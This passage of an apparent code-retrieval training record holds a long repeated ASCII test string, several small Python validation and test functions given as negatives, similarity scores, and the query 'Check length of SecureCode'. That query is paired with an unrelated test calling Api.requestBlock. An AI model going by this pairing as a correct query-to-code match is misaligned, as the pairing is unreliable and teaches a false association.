abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCD\"\n result = Solution().lengthOfLongestSubstring2(s)\n self.assertEqual(result, 95)", "def clean_code(code, lengte):\n return code.zfill(lengte)", "def is_valid(key):\n return key[0:2] == \"MR\" and key[2:].isdigit() and len(key) in [9, 10]", "def _validate_instruction_code_23E(self, val):\n validate_instruction_code(val)\n return val", "def test_valid_length(self):\n f = lws.valid_length\n assert f('', [1]) is True\n assert f('+', [1, 1]) is True\n assert f('+', []) is False\n assert f('?', []) is True\n assert f('?', [1]) is True\n assert f('?', [1, 1]) is False\n assert f('?', [1, 1, 1]) is False\n assert f('*', []) is True\n assert f('*', [1, 1, 1]) is True", "def validateSN(self, ked):\n sn = ked[\"s\"]\n if len(sn) > 32:\n raise ValidationError(\"Invalid sn = {} too large for evt = {}.\"\n \"\".format(sn, ked))\n try:\n sn = int(sn, 16)\n except Exception as ex:\n raise ValidationError(\"Invalid sn = {} for evt = {}.\".format(sn, ked))\n\n return sn", "def _validate_length(data, min, max, err): # lint-amnesty, pylint: disable=redefined-builtin\n if len(data) < min or len(data) > max:\n raise errors.AccountDataBadLength(err)" ]
[ "0.66026425", "0.65196085", "0.65004146", "0.64573944", "0.6349578", "0.63249177", "0.6300502", "0.6252688", "0.6208223", "0.61255306", "0.6125403", "0.6038623", "0.60023403", "0.59888995", "0.5983042", "0.5956225", "0.59148526", "0.586905", "0.585267", "0.58380944", "0.5824577", "0.5806057", "0.57649726", "0.575952", "0.5749711", "0.5721109", "0.5698105", "0.568529", "0.5679416", "0.56778383", "0.5675576", "0.5672751", "0.5671034", "0.56681526", "0.5654222", "0.564896", "0.56350017", "0.56306547", "0.5625956", "0.56178147", "0.56103575", "0.5605694", "0.55979294", "0.5591952", "0.55825377", "0.5579731", "0.55778694", "0.55778694", "0.55740005", "0.55703795", "0.5565338", "0.55571336", "0.5554766", "0.55543095", "0.5542625", "0.5519104", "0.55156326", "0.5508873", "0.5503709", "0.5483815", "0.548267", "0.54717016", "0.5470323", "0.5462175", "0.5458004", "0.54366064", "0.5416097", "0.5415119", "0.5414041", "0.5414041", "0.54121023", "0.54118925", "0.53984344", "0.5389799", "0.5387483", "0.5383788", "0.5382592", "0.5382034", "0.5377261", "0.53736717", "0.5371749", "0.5365452", "0.535551", "0.5349266", "0.53425735", "0.5338752", "0.53385675", "0.53370166", "0.53362846", "0.53346545", "0.533339", "0.5329489", "0.5327528", "0.5324492", "0.53210604", "0.5317277", "0.5312052", "0.5305613", "0.5304149", "0.53017527", "0.5298966" ]
0.0
-1
Check length of SecureCode (SecureCode= 12345 )
def test_40(self): assert 'False' == Api.requestBlock('test-40')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
